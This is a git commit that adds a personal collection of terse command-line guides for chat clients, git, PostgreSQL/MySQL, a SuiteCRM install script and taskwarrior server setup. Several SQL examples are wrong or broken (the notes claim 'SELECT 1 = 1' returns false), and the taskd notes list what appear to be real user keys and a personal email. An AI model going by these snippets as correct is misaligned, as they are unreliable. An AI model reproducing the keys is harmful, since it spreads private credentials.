initial commit
This commit is contained in:
commit
6befc5d3c1
9
README.md
Normal file
9
README.md
Normal file
@ -0,0 +1,9 @@
|
||||
This repository started as personal notes, and it's growing into short guides.
|
||||
|
||||
# Purpose
|
||||
|
||||
1. Minimal theory, maximum practical.
|
||||
2. The statements should go in order of how likely they are to be used: if `git add` has to be used by everyone, then it should go first.
|
||||
3. The scripts should get someone up and running in the shortest possible time.
|
||||
4. No explanations for the program. This isn't an introduction, it's a guide for someone who already wants to use it.
|
||||
|
10
chat/irssi.md
Normal file
10
chat/irssi.md
Normal file
@ -0,0 +1,10 @@
|
||||
|
||||
> /NETWORK LIST
|
||||
> /CHANNEL LIST
|
||||
> /connect chat.freenode.net
|
||||
> /set nick ghast
|
||||
|
||||
> /join #hklbgd
|
||||
> /leave #lkj
|
||||
|
||||
|
22
chat/jitsi.md
Normal file
22
chat/jitsi.md
Normal file
@ -0,0 +1,22 @@
|
||||
# Install Java OpenJDK
|
||||
|
||||
> sudo add-apt-repository ppa:openjdk-r/ppa
|
||||
|
||||
> sudo apt install openjdk-8-jre-headless -y
|
||||
|
||||
# Check Java Version
|
||||
|
||||
> java -version
|
||||
|
||||
This should be at least 1.8.
|
||||
|
||||
# NGingx
|
||||
|
||||
> sudo apt install nginx -y
|
||||
|
||||
This has missing dependencies.
|
||||
|
||||
> sudo apt install nginx-full
|
||||
|
||||
> clean; sudo apt -yf install
|
||||
|
31
chat/khard.md
Normal file
31
chat/khard.md
Normal file
@ -0,0 +1,31 @@
|
||||
|
||||
Short list
|
||||
|
||||
> khard list
|
||||
|
||||
Longer list
|
||||
|
||||
> khard show
|
||||
|
||||
Show from addressbook 'work'
|
||||
|
||||
> khard list -a work
|
||||
|
||||
Make a new contact in address book 'family'
|
||||
|
||||
> khard new -a family
|
||||
|
||||
> khard edit grampa
|
||||
|
||||
> khard remove bob
|
||||
|
||||
Move contact 'nina' from 'work' to 'home' address book.
|
||||
|
||||
> khard move -a home nina -A work
|
||||
|
||||
## Advanced
|
||||
|
||||
Merge:
|
||||
|
||||
> khard merge [-a source_abook] [-u uid|search terms [search terms ...]] [-A target_abook] [-U target_uid|-t target_search_terms]
|
||||
|
10
chat/neomutt.md
Normal file
10
chat/neomutt.md
Normal file
@ -0,0 +1,10 @@
|
||||
|
||||
See version information, plus current options:
|
||||
|
||||
> neomutt -v
|
||||
|
||||
Install notmuch, then run:
|
||||
|
||||
> notmuch setup
|
||||
|
||||
|
50
chat/profanity.md
Normal file
50
chat/profanity.md
Normal file
@ -0,0 +1,50 @@
|
||||
# Pre Setup
|
||||
|
||||
Sign up to an account somewhere.
|
||||
|
||||
# Starting
|
||||
|
||||
> profanity
|
||||
|
||||
> /help ui theme
|
||||
|
||||
> theme load batman
|
||||
|
||||
# OTR
|
||||
|
||||
Install libotr-dev or libotr5-dev or whatever..
|
||||
|
||||
> sudo apt -y install lib5otr-dev
|
||||
|
||||
Make your otr keys.
|
||||
|
||||
> /otr gen
|
||||
|
||||
Then you can start an otr converstation.
|
||||
|
||||
> /otr start bob@jobbies.org
|
||||
|
||||
Or if you already havea conversation windows open, switch to otr using:
|
||||
|
||||
> /otr
|
||||
|
||||
Finally, verify!
|
||||
|
||||
/otr question "Who the fuck are you?" bob
|
||||
|
||||
Bob is verified upon the answer, 'bob'.
|
||||
|
||||
# Finger Prints
|
||||
|
||||
Get yours with
|
||||
|
||||
> /otr myfp
|
||||
|
||||
> /otr theirfp
|
||||
|
||||
> /otr myfp
|
||||
|
||||
# omemo
|
||||
|
||||
Cannot find anyone for this on Arch Wiki, problem is therefore impossible.
|
||||
|
18
chat/wgetpaste.md
Normal file
18
chat/wgetpaste.md
Normal file
@ -0,0 +1,18 @@
|
||||
|
||||
See available pastebins:
|
||||
|
||||
> wgetpaste -S
|
||||
|
||||
Upload script.sh to bpaste:
|
||||
|
||||
> wgetpaste -s bpaste script.sh
|
||||
|
||||
Input clipboard to dpaste with the heading "Title"
|
||||
|
||||
> wgetpaste -s dpaste -d Title -x
|
||||
|
||||
Paste in the file then load the result to the right-hand clipboard:
|
||||
|
||||
> wgetpaste -s dpaste -X
|
||||
|
||||
|
107
data/git.md
Normal file
107
data/git.md
Normal file
@ -0,0 +1,107 @@
|
||||
# Basic Git
|
||||
|
||||
Move to the directory containing the project.
|
||||
|
||||
> git status
|
||||
|
||||
Add this folder (or just any dir)
|
||||
|
||||
> git add .
|
||||
|
||||
History:
|
||||
|
||||
> git log
|
||||
|
||||
# Commits
|
||||
|
||||
Add current changes to current config.
|
||||
|
||||
> git add .
|
||||
|
||||
Make a comment:
|
||||
|
||||
> git commit -m "Created service"
|
||||
|
||||
Type out a message:
|
||||
|
||||
> git commit
|
||||
|
||||
Push your stuff out:
|
||||
|
||||
> git push
|
||||
|
||||
Add a single line:
|
||||
|
||||
> git log --oneline
|
||||
|
||||
Get recent changes:
|
||||
|
||||
> git pull
|
||||
|
||||
# New Project
|
||||
|
||||
> git init
|
||||
|
||||
# New Machines
|
||||
|
||||
> git config --global user.email "malinfreeborn@tutamail.com"
|
||||
|
||||
> git config --global user.name "Malin Freeborn"
|
||||
|
||||
# Branches
|
||||
|
||||
To make a new branch, make sure you're up to date, then:
|
||||
|
||||
> git checkout -b [branchname]
|
||||
|
||||
Check otu all branches with
|
||||
|
||||
> git branch -a
|
||||
|
||||
Add the new branch to a git:
|
||||
|
||||
> git push origin [branchname]
|
||||
|
||||
|
||||
# Tricks
|
||||
|
||||
## Delete All History
|
||||
|
||||
> git checkout --orphan temp
|
||||
|
||||
> git add -A
|
||||
|
||||
> git commit -am "release the commits!"
|
||||
|
||||
> git branch -D master
|
||||
|
||||
> git branch -m master
|
||||
|
||||
> git push -f origin master
|
||||
|
||||
Gitlab requires more changes, such as going to `settings > repository` and switching the main branch, then stripping protection.
|
||||
|
||||
# Subtree
|
||||
|
||||
The project has subdirectories sub-1,sub-2,sub-3. The first should be its own repository, but should also retain its own history.
|
||||
|
||||
First, we extract its history as an independent item, and make that into a seprate branch.
|
||||
|
||||
> git subtree split --prefix=sub-1 -b sub
|
||||
|
||||
If you want something a few directories deep, you can use `--prefix=sub-1/dir-2/dir-3
|
||||
|
||||
Then go and create a new git somewhere else:
|
||||
|
||||
> cd ..;mkdir sub-1;cd sub-1;git init --bare
|
||||
|
||||
|
||||
Then go back to your initial git repo, and do the following:
|
||||
|
||||
git push ../subtest sub:master
|
||||
|
||||
Finally, you can clone this repo from your original.
|
||||
|
||||
> git clone ../subtest
|
||||
|
||||
|
42
data/sc-im.md
Normal file
42
data/sc-im.md
Normal file
@ -0,0 +1,42 @@
|
||||
# Basic Commands
|
||||
|
||||
> H = highest part
|
||||
> L = lowest part
|
||||
> gg = top
|
||||
|
||||
> g$ = most right.
|
||||
> g0 = most left.
|
||||
|
||||
> \ = insert middle
|
||||
> > = insert left
|
||||
> < = insert right
|
||||
|
||||
gb4 = to to cell b4
|
||||
|
||||
> x = delete a cell
|
||||
> aa = see all text in cells
|
||||
|
||||
> f = format cells so you can see it.
|
||||
> fl = format wider right
|
||||
> fh = format smaller left
|
||||
|
||||
> fj = decrease decimal value
|
||||
> fk = increase decimal value
|
||||
|
||||
# Edit
|
||||
|
||||
> e = edit a number
|
||||
> E = edit text
|
||||
> dc = delete column
|
||||
> yc = yank column
|
||||
> dr = delete row
|
||||
> p = literal paste
|
||||
> Pc = paste mutatis mutandis
|
||||
|
||||
#Functions
|
||||
|
||||
> =@avg(B1:B4) = average B1 to B4
|
||||
> =@max(B1:B4) = maximum of those numbers
|
||||
> =@min(B1:B8) = minimumof those numbers
|
||||
|
||||
|
10
data/sdcv.md
Normal file
10
data/sdcv.md
Normal file
@ -0,0 +1,10 @@
|
||||
|
||||
# Install new dictionaries
|
||||
|
||||
If the path doesn't exist then:
|
||||
|
||||
> sudo mkdir -p /usr/share/stardict/dic
|
||||
|
||||
Then move the dictionaries there.
|
||||
|
||||
|
1009
data/sql/person.sql
Normal file
1009
data/sql/person.sql
Normal file
File diff suppressed because it is too large
Load Diff
354
data/sql/postgresql.md
Normal file
354
data/sql/postgresql.md
Normal file
@ -0,0 +1,354 @@
|
||||
# Setup
|
||||
|
||||
Install postgres and start it as a service, then start with:
|
||||
|
||||
> psql
|
||||
|
||||
## Make a database as the new user postgres
|
||||
|
||||
> sudo su postgres
|
||||
|
||||
> [postgres] echo $HOME
|
||||
|
||||
> [postgres]
|
||||
|
||||
> [postgres] CREATE DATABASE dvdrental;
|
||||
|
||||
## Sample Data
|
||||
|
||||
Get sample data.
|
||||
|
||||
> wget http://www.postgresqltutorial.com/wp-content/uploads/2019/05/dvdrental.zip
|
||||
|
||||
And then get the pdf mapping the sample data:
|
||||
|
||||
> wget http://www.postgresqltutorial.com/wp-content/uploads/2018/03/printable-postgresql-sample-database-diagram.pdf
|
||||
|
||||
Unzip and load sample data:
|
||||
|
||||
> unzip dvdrental.zip
|
||||
|
||||
> sudo su postgres
|
||||
|
||||
|
||||
> [postgres] $ pg_restore -U postgres -d dvdrental dvdrental.tar
|
||||
|
||||
|
||||
> [postgres]
|
||||
|
||||
# Commands
|
||||
|
||||
## Basics
|
||||
|
||||
List available databases.
|
||||
|
||||
> \l
|
||||
|
||||
You'll see a list of available databases like:
|
||||
|
||||
`dnd`
|
||||
|
||||
`dvdrentals`
|
||||
|
||||
Then you can connect to one:
|
||||
|
||||
> \c dvdrental
|
||||
|
||||
And have a look at what tables it has:
|
||||
|
||||
> \d dvdrental
|
||||
|
||||
If it has tables such as `language`, `film_actor` and `inventory`, you can see the table's settings with:
|
||||
|
||||
> \dt film_actor
|
||||
|
||||
And pull back the entire table:
|
||||
|
||||
> SELECT * from film_actor;
|
||||
|
||||
## Various
|
||||
|
||||
Connect to 231.13.48.38 with user 'bob', port 1234, database 'X'
|
||||
|
||||
> psql -h 231.13.48.38 -p1234 -U bob X
|
||||
|
||||
# Setup Yourself
|
||||
|
||||
Make database "test" and connect to it.
|
||||
|
||||
> CREATE DATABASE test;
|
||||
|
||||
> \l test
|
||||
|
||||
Delete database 'dogs':
|
||||
|
||||
> DROP DATABASE dogs;
|
||||
|
||||
Making a table has a basic form of:
|
||||
|
||||
`CREATE TABLE table_name (`
|
||||
|
||||
then [ column name ] + [data type ] ... (and possibly data constraints)
|
||||
|
||||
`)`
|
||||
|
||||
|Data Types | Meaning | Constraints |
|
||||
|:----|:----|:----|
|
||||
| BIGSERIAL | A number incrementing by one each entry | 'NOT NULL PRIMARY KEY (so it's used for relational reference) |
|
||||
| int | integer | (50) limits the table to 50, e.g. `int(50)`|
|
||||
| VARCHAR | any characters | limit, e.g.`VARCHAR(70)`|
|
||||
| TIMESTAMP | time | |
|
||||
| date | date | |
|
||||
| text | text? | |
|
||||
| tsquery | text search query | |
|
||||
| money | money | |
|
||||
| json | textual JSON data | |
|
||||
| cidr | ipv4 or 6 address | |
|
||||
| macaddr | mac address | |
|
||||
|
||||
|
||||
E.g.
|
||||
|
||||
```
|
||||
CREATE TABLE character (
|
||||
id int,
|
||||
str int(1),
|
||||
dex int(1),
|
||||
spd int(1),
|
||||
int int(1),
|
||||
wts int(1),
|
||||
cha int(1));
|
||||
|
||||
```
|
||||
|
||||
See your table:
|
||||
|
||||
> \d
|
||||
|
||||
Look at what columns you have there:
|
||||
|
||||
> \d character
|
||||
|
||||
But this allows for empty characters, so...
|
||||
|
||||
```
|
||||
|
||||
CREATE TABLE person (
|
||||
id BIGSERIAL NOT NULL PRIMARY KEY,
|
||||
first_name VARCHAR(50) NOT NULL,
|
||||
last_name VARCHAR(50) NOT NULL,
|
||||
last_name VARCHAR(50) NOT NULL,
|
||||
gender VARCHAR(7) NOT NULL,
|
||||
date_of_birth DATE NOT NULL,
|
||||
);
|
||||
|
||||
```
|
||||
|
||||
Delete with
|
||||
|
||||
> DROP TABLE person;
|
||||
|
||||
## Inserting Data
|
||||
|
||||
```
|
||||
|
||||
INSERT INTO person (
|
||||
first_name,
|
||||
last_name,
|
||||
gender,
|
||||
date_of_birth)
|
||||
VALUES ('Hugi','Smith','DWARF', date '200-01-12');
|
||||
|
||||
```
|
||||
|
||||
## Selecting Data
|
||||
You can also mass select by choosing to insert a file. Download example data [here](https://mockaroo.com/).
|
||||
|
||||
> \i /home/ghost/file.sql
|
||||
|
||||
Various querries:
|
||||
|
||||
> SELECT * FROM person;
|
||||
|
||||
> SELECT * FROM person ORDER BY id DESC;
|
||||
|
||||
> SELECT * FROM person
|
||||
|
||||
## Offset, Fetch and Limit
|
||||
|
||||
'Limit' is not official, but was accepted later:
|
||||
|
||||
> SELECT * FROM person ORDER BY country ASC LIMIT 10;
|
||||
|
||||
The official way to make a limit is 'FIRST 5 ROWS ONLY:
|
||||
|
||||
> SELECT * FROM person OFFSET 5 FETCH FIRST 5 ROWS ONLY;
|
||||
|
||||
> SELECT * FROM person where gender = 'Male' AND ( country_of_birth = 'Poland' OR country_of_birth = 'China');
|
||||
|
||||
Miss out the first 5 result with 'OFFSET 5'.
|
||||
|
||||
> SELECT p\* FROM PERSON WHERE gender = 'Female' AND country_of_birth = 'Kosovo' OFFSET 5;
|
||||
|
||||
> SELECT * FROM person OFFSET 5 FETCH FIRST 7 ROW ONLY;
|
||||
|
||||
## Advanced Selection
|
||||
|
||||
This query takes a lot of typing:
|
||||
|
||||
> SELECT * FROM person WHERE country_of_birth = 'China'
|
||||
> OR country_of_birth = 'Kosovo'
|
||||
> OR country_of_birth = 'Brazil';
|
||||
|
||||
You can write the same thing with less typing:
|
||||
|
||||
> SELECT *
|
||||
> FROM person
|
||||
> WHERE country_of_birth in ('China','Kosovo','Brazil');
|
||||
|
||||
> SELECT * FROM person
|
||||
> WHERE date_of_birth
|
||||
BETWEEN DATE '2018-04-10' AND '2019-01-01'
|
||||
> ORDER BY date_of_birth;
|
||||
|
||||
### Rough Search
|
||||
|
||||
Similar words - we can find emails ending in '.com'.
|
||||
|
||||
> SELECT * FROM person
|
||||
> WHERE email LIKE '%.com';
|
||||
|
||||
Or any gmail address:
|
||||
|
||||
> SELECT * FROM person
|
||||
> WHERE email LIKE '%@gmail.%';
|
||||
|
||||
Or particular characters, where three precede 'gmail.com' and it's case insensitive:
|
||||
|
||||
> SELECT * FROM person
|
||||
> WHERE email iLIKE '\_\_\_@gmail.com';
|
||||
|
||||
### Groups and Aggregates
|
||||
|
||||
Select all countries as a complete mess:
|
||||
|
||||
> SELECT country_of_birth FROM person;
|
||||
|
||||
Select countries with proper grouping:
|
||||
|
||||
> SELECT country_of_birth FROM person GROUP BY country_of_birth;
|
||||
|
||||
Select countries and count instances:
|
||||
|
||||
> SELECT country_of_birth, COUNT(\*) FROM person GROUP BY country_of_birth ORDER BY country_of_birth;
|
||||
|
||||
Also select a minimum number with 'having'. What you have must be before 'order by'.
|
||||
|
||||
> SELECT country_of_birth, COUNT(\*) FROM person GROUP BY country_of_birth HAVING COUNT(\*) > 5;
|
||||
|
||||
> SELECT country_of_birth, COUNT(\*) FROM person GROUP BY country_of_birth HAVING COUNT(\*) >= 10;
|
||||
|
||||
Other aggregates include 'max', 'min'.
|
||||
|
||||
Select most expensive car:
|
||||
|
||||
> SELECT MAX(price) FROM car;
|
||||
|
||||
> SELECT MIN(price) FROM car;
|
||||
|
||||
> SELECT AVG(price) FROM car;
|
||||
|
||||
We can stick items together for better grouping:
|
||||
|
||||
> SELECT make, model, MAX(price) FROM car GROPU BY make, model;
|
||||
|
||||
Select all fields from table 'car', and add a column containing another price, discounted to 90%, rounded to two decimal places.
|
||||
|
||||
> SELECT id,make,model,price,ROUND(price * .9, 2) from car;
|
||||
|
||||
Same thing, but take 10% of the price from the price.
|
||||
|
||||
> SELECT id,make,model,price,ROUND(price - (price * .1), 2) from car;
|
||||
|
||||
|
||||
|
||||
## Comparison
|
||||
|
||||
> SELECT 10 + 2^2;
|
||||
|
||||
> SELECT 10! * 2 - 3;
|
||||
|
||||
... et c.
|
||||
|
||||
This returns false:
|
||||
|
||||
> SELECT 1 = 1;
|
||||
|
||||
These return false:
|
||||
|
||||
> SELECT 2<1;
|
||||
|
||||
Or '1 is not equal to 1':
|
||||
|
||||
> SELECT 1<>1;
|
||||
|
||||
And with strings, 'G is not the same as g':
|
||||
|
||||
> SELECT 'G'<>'g';
|
||||
|
||||
### Car Disconts
|
||||
|
||||
You want to show the discounts on various cars. You check which columns are available and select all of them:
|
||||
|
||||
> \d car
|
||||
|
||||
> SELECT id,make,model,price FROM car;
|
||||
|
||||
## Aliases
|
||||
|
||||
You can change what a column name appears as with:
|
||||
|
||||
> select price AS original_price from car;
|
||||
|
||||
# Null Values
|
||||
|
||||
## Coalesce
|
||||
|
||||
You can input a series of entries, requesting the first one which is present. Here we input three entries which are 'null', and a third which is '2', so '2' is selected:
|
||||
|
||||
> SELECT COALESCE(null, null, 2) AS number;
|
||||
|
||||
When selecting column 'email' from table 'person', you can input the string 'Email not provided' if there is no email provided:
|
||||
|
||||
> SELECT COALESCE(email, 'Email not provided') from person;
|
||||
|
||||
## Nullif
|
||||
|
||||
Normally, devision by 0 produces an error:
|
||||
|
||||
> SELECT 10/ 0;
|
||||
|
||||
But 10 divided by 'null' produces only 'null', which is not an error.
|
||||
|
||||
The 'nullif' statement takes two numbers, and returns 'null' iff the numbers are the same as each other.
|
||||
|
||||
> select nullif(0,0)
|
||||
> select nullif(10,10)
|
||||
|
||||
# Date
|
||||
|
||||
Select date:
|
||||
|
||||
> SELECT NOW()::DATE;
|
||||
|
||||
> SELECT NOW()::TIME;
|
||||
|
||||
or just:
|
||||
|
||||
> SELECT NOW();
|
||||
|
||||
More [here](postgresql.org/docs/11/datatype-datetime.html).
|
||||
|
||||
|
||||
2h23m
|
||||
|
90
data/sql/sql.md
Normal file
90
data/sql/sql.md
Normal file
@ -0,0 +1,90 @@
|
||||
MySQL, Aurora and the Maria Database work similarly, and mostly with the same commands.
|
||||
|
||||
MySQL requires 160 Megs of disk space.
|
||||
|
||||
The ontological layers go:
|
||||
|
||||
> Database > table > record > field
|
||||
|
||||
The record is a line containing multiple fields. The table contains multiple records.
|
||||
|
||||
## Database: RPGs
|
||||
|
||||
### Table: D&D
|
||||
|
||||
#### Columns:
|
||||
|
||||
| id | name | year | edition | stars |
|
||||
|:--:|:-------------------|:-----|:--------|:------|
|
||||
| 1 | Dungeons & Dragons | 1975 | 1 | 1 |
|
||||
| 2 | Dungeons & Dragons | 1980 | 2 | 1 |
|
||||
| 3 | Advanced Dungeons & Dragons | 1985 | 1 | 1 |
|
||||
|
||||
|
||||
# Getting started
|
||||
|
||||
> sudo apt-get install mysql-server
|
||||
|
||||
You'll be asked for a password.
|
||||
|
||||
Log in with:
|
||||
|
||||
> mysql -u root -p
|
||||
|
||||
The -u requests a user, while -p tells it to prompt for a password.
|
||||
|
||||
List all databases:
|
||||
|
||||
> show databases;
|
||||
|
||||
Make a new database;
|
||||
|
||||
> create database creatures;
|
||||
|
||||
Start work on the new database:
|
||||
|
||||
> use creatures;
|
||||
|
||||
> create table stats (Strength VARCHAR(2), Speed VARCHAR(2), Dexterity(2));
|
||||
|
||||
This creatures a row called 'stats' within the 'creature'table' with a number of variables, all of type VARCHAR (a variable length character string).
|
||||
|
||||
Now you can insert data (which would normally be provided by a user via php or some-such).
|
||||
|
||||
> insert into stats (Strength,Speed,Dexterity) values (-1,0,+1)
|
||||
|
||||
Now have a look at the info:
|
||||
|
||||
> select * from stats
|
||||
|
||||
The old way to delete info by selection was:
|
||||
|
||||
> delete * from stats where Charisma='0'
|
||||
|
||||
...but now it's:
|
||||
|
||||
> delete from stats where Charisma='0'
|
||||
|
||||
Update a thing:
|
||||
|
||||
> update stats
|
||||
|
||||
> set Speed='-1',Charisma='-2'
|
||||
|
||||
> where Strength=0;
|
||||
|
||||
Leaving out the specifier 'where' means you're updating the entire database.
|
||||
|
||||
Control order with
|
||||
|
||||
> SELECT * FROM stats ORDER BY Strength;
|
||||
|
||||
Or for descending order, suffix 'DESC'.
|
||||
|
||||
> select * from stats ORDER by Date DESC;
|
||||
|
||||
# Resources
|
||||
|
||||
Try more at [w3schools](http://www.w3schools.com/sql/sql_groupby.asp).
|
||||
|
||||
|
6
data/sql/tricks.md
Normal file
6
data/sql/tricks.md
Normal file
@ -0,0 +1,6 @@
|
||||
|
||||
# Find data from any table
|
||||
|
||||
> pg_dump --data-only --inserts -U postgres your-db-name > a.tmp
|
||||
|
||||
> grep 'my string' a.tmp
|
40
data/suitecrm/suitecrm.sh
Normal file
40
data/suitecrm/suitecrm.sh
Normal file
@ -0,0 +1,40 @@
|
||||
#!/bin/bash
|
||||
|
||||
[ ! -z $1 ] && sudo apt-get install -y virtualbox-guest-additions-iso
|
||||
|
||||
sudo apt-get -y install wget php php-{pear,cgi,common,curl,mbstring,gd,mysql,gettext,bcmath,imap,json,xml,fpm}
|
||||
|
||||
clear
|
||||
|
||||
echo 'The correct version of php should be 7.2.8 or greater.'
|
||||
|
||||
echo "The current version is $(php -v | grep PHP)"
|
||||
|
||||
sleep 5
|
||||
|
||||
sudo sh -c 'printf "upload_max_filesize = 20M\nmax_execution_time = 120\n" >> /etc/php.ini'
|
||||
|
||||
sudo apt-get install -y nginx
|
||||
|
||||
# Installing mariadb server
|
||||
|
||||
## uninstall any old versions first
|
||||
|
||||
## install software-properties-common if missing
|
||||
|
||||
sudo apt-get install -y software-properties-common
|
||||
|
||||
# then get the keys to the server
|
||||
|
||||
sudo apt-key adv --recv-keys --keyserver hkp://keyserver.ubuntu.com:80 0xF1656F24C74CD1D8
|
||||
|
||||
sudo add-apt-repository "deb [arch=amd64,arm64,ppc64el] http://mariadb.mirror.liquidtelecom.com/repo/10.4/ubuntu $(lsb_release -cs) main"
|
||||
|
||||
sudo apt -y update && sudo apt -y install mariadb-server mariadb-client
|
||||
|
||||
# Enter a password for the database, or if you did not get a prompt, run:
|
||||
|
||||
|
||||
sudo mysql_secure_installation
|
||||
|
||||
# Then just accept defaults
|
30
data/taskwarrior/.no
Normal file
30
data/taskwarrior/.no
Normal file
@ -0,0 +1,30 @@
|
||||
setting up with:
|
||||
|
||||
- data at /var/taskd
|
||||
- user: root
|
||||
- host=localhost
|
||||
- port=53589
|
||||
|
||||
- Organization=Andonome
|
||||
- Name="Malin Freeborn"
|
||||
|
||||
## Next
|
||||
Copy files to ~/.task
|
||||
/usr/share/doc/taskd/pki/{ca.cert.pem,Malin_Freeborn.cert.pem,Malin_Freeborn.key.pem}
|
||||
|
||||
And run these commands:
|
||||
|
||||
```
|
||||
Malin Freeborn must run these commands:
|
||||
task config taskd.server localhost:53589
|
||||
task config taskd.credentials 'Andonome/Malin Freeborn/36faa2a9-de12-4410-99d5-0bcaa5a4887a'
|
||||
task config taskd.certificate ~/.task/Malin_Freeborn.cert.pem
|
||||
task config taskd.key ~/.task/Malin_Freeborn.key.pem
|
||||
task config taskd.ca ~/.task/ca.cert.pem
|
||||
task config taskd.trust strict
|
||||
task config taskd.ciphers NORMAL
|
||||
|
||||
|
||||
```
|
||||
|
||||
|
57
data/taskwarrior/archtask.sh
Normal file
57
data/taskwarrior/archtask.sh
Normal file
@ -0,0 +1,57 @@
|
||||
#!/bin/bash
|
||||
|
||||
export TASKDDATA=/var/lib/taskd
|
||||
|
||||
echo Change CN to hostname
|
||||
sleep 2
|
||||
|
||||
sudo vim /usr/share/doc/taskd/pki/vars
|
||||
|
||||
cd /usr/share/doc/taskd/pki/
|
||||
|
||||
sudo ./generate
|
||||
|
||||
mkdir -p $TASKDDATA
|
||||
|
||||
cp *.pem $TASKDDATA
|
||||
|
||||
chown -R root /var/lib/taskd
|
||||
|
||||
sudo cp *pem $TASKDDATA
|
||||
|
||||
chown -R taskd:taskd $TASKDDATA
|
||||
|
||||
taskd config "$user".cert=/var/lib/taskd/client.cert.pem
|
||||
taskd config "$user".key=/var/lib/taskd/client.key.pem
|
||||
taskd config "$(hostname)".cert=/var/lib/taskd/server.cert.pem
|
||||
taskd config "$(hostname)".key=/var/lib/taskd/server.key.pem
|
||||
taskd config "$(hostname)".crl=/var/lib/taskd/server.crl.pem
|
||||
taskd config ca.cert=/var/lib/taskd/ca.cert.pem
|
||||
|
||||
taskd config --force server $(hostname):53589
|
||||
|
||||
systemctl start taskd
|
||||
|
||||
|
||||
echo name a group
|
||||
read group
|
||||
|
||||
echo name user
|
||||
|
||||
read user
|
||||
|
||||
taskd add org $group
|
||||
|
||||
taskd add user $group $user
|
||||
|
||||
./generate.client $user
|
||||
|
||||
echo "
|
||||
taskd.server=alfred:port
|
||||
taskd.credentials=$group/$user/key
|
||||
taskd.certificate=~/.task/'$user'.cert.pem
|
||||
taskd.key=~/.task/'$user'.key.pem
|
||||
taskd.ca=~/.task/ca.cert.pem" >> /var/lib/taskd/config
|
||||
|
||||
tar cf $user.tar "$user"* ca.cert.pem
|
||||
|
34
data/taskwarrior/task.md
Normal file
34
data/taskwarrior/task.md
Normal file
@ -0,0 +1,34 @@
|
||||
# Contexts
|
||||
|
||||
Set three contexts by their tags:
|
||||
|
||||
> task context define work +sa or +hr
|
||||
|
||||
> task context define study +ed or +void or +rat
|
||||
|
||||
> task context define home -sa -hr -ed -void -rat
|
||||
|
||||
Change to the first context.
|
||||
|
||||
> task context work
|
||||
|
||||
Then stop.
|
||||
|
||||
> task context none
|
||||
|
||||
# Review
|
||||
|
||||
View list of tasks completed in the last week:
|
||||
|
||||
> task end.after:today-1wk completed
|
||||
|
||||
# Timewarrior
|
||||
|
||||
> timew start ed 'learn timewarrior'
|
||||
|
||||
> timew stop
|
||||
|
||||
> timew summary
|
||||
|
||||
> timew tags
|
||||
|
178
data/taskwarrior/taskd.md
Normal file
178
data/taskwarrior/taskd.md
Normal file
@ -0,0 +1,178 @@
|
||||
Switch to root to make things easier.
|
||||
|
||||
> yay -S
|
||||
|
||||
> export TASKDDATA=/var/lib/taskd
|
||||
|
||||
Edit `/usr/share/doc/taskd/pki/vars` so that ``CN'' = the hostname (IP is fine).
|
||||
|
||||
> cd /usr/share/doc/taskd/pki
|
||||
|
||||
Execute the `generate` file to generate a selfsigned certificate for the server. These will be \*.pem-files. Copy all \*.pem-files to /var/lib/taskd.
|
||||
|
||||
Make sure a copy of ca.cert.pem remains to generate user-certificates later.
|
||||
|
||||
# Taskd Configurations
|
||||
|
||||
> taskd config --force client.cert $TASKDDATA/client.cert.pem
|
||||
|
||||
> taskd config --force client.key $TASKDDATA/client.key.pem
|
||||
|
||||
> taskd config --force server.cert $TASKDDATA/server.cert.pem
|
||||
|
||||
> taskd config --force server.key $TASKDDATA/server.key.pem
|
||||
|
||||
> taskd config --force server.crl $TASKDDATA/server.crl.pem
|
||||
|
||||
> taskd config --force ca.cert $TASKDDATA/ca.cert.pem
|
||||
|
||||
# Change Taskd Log Location
|
||||
The default is /tmp/log, which obviously you don't want.
|
||||
|
||||
> touch /var/log/taskd.log
|
||||
|
||||
> chown taskd:taskd /var/log/taskd.log
|
||||
|
||||
> taskd config --force log /var/log/taskd.log
|
||||
|
||||
Finally, set up the servername - the same one as in the certificates. Mine is ``testarch''.
|
||||
|
||||
> taskd config --force server testarch:9001
|
||||
|
||||
# Adding users
|
||||
Let's add the group ``home'', then the user ``ghost'', will go in that group.
|
||||
|
||||
> taskd add org home
|
||||
|
||||
> taskd add user home ghost
|
||||
|
||||
`3f9e6154-25cb-4e45-88bb-45e98feef904`
|
||||
|
||||
> taskd add user home alfred
|
||||
|
||||
`4fbb319c-c493-437a-ab7a-028f5b75e522`
|
||||
|
||||
The user then gets a key.
|
||||
|
||||
Finally, make sure that taskd can read its own data>
|
||||
|
||||
> chown -R taskd:taskd /var/lib/taskd/orgs
|
||||
|
||||
... or perhaps the entire directory of /var/lib/taskd/.
|
||||
|
||||
Then it's back to /usr/share/doc/taskd/pki
|
||||
|
||||
Generate some userfiles:
|
||||
|
||||
> ./generate.client ghost
|
||||
|
||||
> ./generate.client alfred
|
||||
|
||||
The bob and ghost \*pem files have to be added to the given users' home directories.
|
||||
|
||||
# Setting up Users
|
||||
|
||||
> sudo apt-get install taskwarrior taskd
|
||||
|
||||
> task
|
||||
|
||||
Then move the \*pem files into the .task directory of the user.
|
||||
|
||||
Don't forget to add the ca.key.pem from `/usr/share/doc/taskd/pki`!
|
||||
|
||||
# Attempt 2
|
||||
|
||||
Well, none of that worked.
|
||||
|
||||
New info from [taskwarrior](https://gitpitch.com/GothenburgBitFactory/taskserver-setup#/1/4)
|
||||
|
||||
Default port = 53589
|
||||
|
||||
starting with
|
||||
|
||||
> taskd init
|
||||
|
||||
> taskd config server localhost:53589
|
||||
|
||||
View supported settings with `taskdrc`.
|
||||
|
||||
!!! Start with taskdctl start
|
||||
|
||||
Do a non-daemon version with
|
||||
|
||||
> taskd server --data $TASKDDATA --daemon
|
||||
|
||||
# Systemd Unit file
|
||||
|
||||
This needs to be edited for "$TASKDDATA", "$TASKDUSER", and "$TASKDGROUP".
|
||||
|
||||
|
||||
---
|
||||
Unit]
|
||||
Description=Secure server providing multi-user, multi-client access to Taskwarrior data
|
||||
Requires=network.target
|
||||
After=network.target
|
||||
Documentation=http://taskwarrior.org/docs/#taskd
|
||||
|
||||
[Service]
|
||||
ExecStart=/usr/local/bin/taskd server --data $TASKDDATA
|
||||
Type=simple
|
||||
User=$TASKDUSER
|
||||
Group=$TASKDGROUP
|
||||
WorkingDirectory=$TASKDDATA
|
||||
PrivateTmp=true
|
||||
InaccessibleDirectories=/home /root /boot /opt /mnt /media
|
||||
ReadOnlyDirectories=/etc /usr
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
|
||||
---
|
||||
|
||||
Enable all this by copying the file to `/etc/systemd/system`, reload daemon, then start it.
|
||||
|
||||
Key for ghost:
|
||||
29bd8a06-2cc0-4163-905d-6216257a3031
|
||||
|
||||
